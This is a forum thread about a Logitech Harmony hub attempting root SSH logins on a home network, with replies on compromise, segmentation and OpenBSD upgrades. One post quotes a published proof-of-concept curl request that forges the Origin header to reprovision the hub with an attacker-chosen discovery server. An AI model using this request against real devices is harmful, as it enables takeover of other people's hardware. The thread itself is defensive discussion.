think tank forum

technology » security issues and backdoors in commercial products

lucas's avatar
5 years ago
link
lucas
i ❤ demo
my pf firewall only lets two ports in, each going to ssh on a bsd-variant host. no other traffic can come in.

i have a logitech harmony hub internally using 10.6.6.5, with no external ports mapped to it.

it seems to be doing nefarious shit, like trying to login to ssh on my bsd-variant hosts:

Jan 24 18:39:29 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: error: PAM: authentication error for root from 10.6.6.5
Jan 24 18:39:47 atlas sshd[15390]: Failed keyboard-interactive/pam for root from 10.6.6.5 port 63813 ssh2


i'm second-guessing letting any commercial products on my lan. but maybe wifi lan should be treated like the wild west anyway, assuming hosts may be hostile?

thoughts?
phi_'s avatar
5 years ago
link
phi_
... and let the Earth be silent after ye.
Always assume hosts are hostile. Even if they're not, it's one 0-day exploit away from being so.

But I have NO idea why your Hub is even trying to do that ... Hub runs Linux, right? Could be compromised. Embedded Linux can be terrifyingly insecure...
phi_'s avatar
5 years ago
link
phi_
... and let the Earth be silent after ye.
"The hub processes all network requests from remote hosts, but attempts to verify the origin before actually handling the request. This is a great security mechanism in theory; however, the attacker can easily forge the origin with a single line in the HTTP header. This allows any remote attacker to bypass the origin validation check, giving them access to all of the protected message handling functionality."

https://medium.com/tenable-techblog/owning-th … 2135e4adac
lucas's avatar
5 years ago
link
lucas
i ❤ demo
in that article's exploit, someone needs to send a packet to the hub to change its timeserver.

curl -d "{'cmd':'setup.account?provision',
  'params':
    {
    'provisionInfo':
      {
        'mode':3,
        'authToken':'1',
        'discoveryServer':'http://10.0.0.10'
      }
    }
  }"
  -H "Origin: .myharmony.com"
  -H "Content-Type: application/json"
  http://10.0.0.176 :8088


which takes advantage of the hub's open port 8088. but like i mentioned, i don't open any of these ports to the internet.

so maybe another host on my network was compromised, and it passed such a packet to the hub to compromise it as well. or perhaps the hub was exploited using another vulnerability (my only guess would be a man-in-the-middle).

either way, i'm creeped out that the logitech harmony hub is trying to login to my fileserver over ssh. what should i do about that?
bluet's avatar
5 years ago
link
bluet
> either way, i'm creeped out that the logitech harmony hub is trying to login to my fileserver over ssh. what should i do about that?

let it log in, and see what it does! use a throwaway virtual machine as your honeypot
lucas's avatar
5 years ago
link
lucas
i ❤ demo
maybe give user root password of "password" ? or maybe no password with none required?

unfortunately, i haven't seen these attempts since. so maybe i missed my chance...

--

for now, i just took these steps to secure my other hosts:
- updated OSes and packages
- changed all sshd instances to only permit public key logins

--

also, does openbsd 4.9 really have no vulnerabilities besides this one regarding BIND? [errata49]
phi_'s avatar
5 years ago
link
phi_
... and let the Earth be silent after ye.
OpenBSD doesn't patch/address more than 1 or 2 minor versions back, so I'm sure there are more vulnerabilities than the BIND one that either weren't revealed or weren't fixed by the time 5.2 came out.
lucas's avatar
5 years ago
r1, link
lucas
i ❤ demo
why don't they say that anywhere? i've been trying to figure out if that's the case :/
phi_'s avatar
5 years ago
link
phi_
... and let the Earth be silent after ye.
I thought they did. If not, I may very well be mistaken. I've been operating under that impression this whole time, unfortunately. Maybe check out misc@ or bugs@ for more info. I know their packages never get updated once released in the -STABLE branches to keep older installations working. Perhaps it's the same with base... to keep too many minor changes from breaking previous versions?

If you are willing to run it on server hardware, -CURRENT should keep you in patches whenever they do come out. :/
lucas's avatar
5 years ago
link
lucas
i ❤ demo
i'd wager that you're right. i just had been looking for such information and failing to find it.
phi_'s avatar
5 years ago
link
phi_
... and let the Earth be silent after ye.
Is there a specific reason for retaining 4.9 on that machine? You're missing out on YEARS of advancement and security upgrades.
lucas's avatar
5 years ago
r2, link
lucas
i ❤ demo
reason is my lack of time to upgrade it. i hate disclosing on the Internet that i'm running such an old version.

BUT i did just order new hardware for a replacement host. just because it will be easier to get a replacement host running and configured, then swap out the old host with a new one. plus the hardware has improved significantly since then, and it's only ~$160, which is insignificant compared to the cost of my time (maybe 8 hours to get it set up and working as i want, when i'm trying to do lots of work on my dissertation).

old hardware is outlined here

new hardware is outlined here
phi_'s avatar
5 years ago
link
phi_
... and let the Earth be silent after ye.
Spend the time to upgrade ... sysupgrade(8) is awesome.
asemisldkfj's avatar
4 years ago
link
asemisldkfj
the law is no protection
I've done some half-assed segregation of my home network into different vlans. VMs I run live on a special vlan that I only get access to via authpf. I think by default wifi clients are on the same network as like my apple tv and nest thermostat; I could probably isolate "smart" devices like that more than I do, but those are the only two I have.